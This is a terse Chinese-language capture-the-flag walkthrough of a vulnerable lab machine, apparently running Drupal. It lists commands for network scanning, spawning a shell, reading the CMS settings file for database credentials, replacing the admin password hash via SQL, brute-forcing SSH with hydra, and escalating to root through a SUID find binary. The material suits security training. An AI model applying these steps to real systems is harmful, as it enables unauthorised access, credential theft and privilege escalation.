主机发现
arp-scan -l //或者netdiscover找到对应主机
nmap
80端口
whatweb
robots.txt
dirsearch目录扫描
msf或者searchsploit或
https://www.exploit-db.com/
交互shell 拿到flag1
python -c 'import pty; pty.spawn("/bin/bash")'
提示查看CMS配置文件(百度搜索路径)拿flag2
cat /var/www/sites/default/settings.php
获取mysql账号密码 登录后查表
密码加密,找到加密脚本
利用PHP+加密脚本+密码(用加密后的密码替换已存在用户的密码)
php /var/www/scripts/password-hash.sh 123456
update users set pass='$S$DQ7XxSb7EkVStR52Y0e4KNok54.i1lt0oJXBMfFGD/VU1iZ0nKWZ' where name="admin";
登录成功 拿到flag3
根据提示需要提权
hydra爆破ssh
登录后拿flag4
## suid提取 拿最后一个flag
find / -perm -u=s -type f 2>/dev/null
find /etc/passwd -exec whoami \;
find /etc/passwd -exec "/bin/sh" \;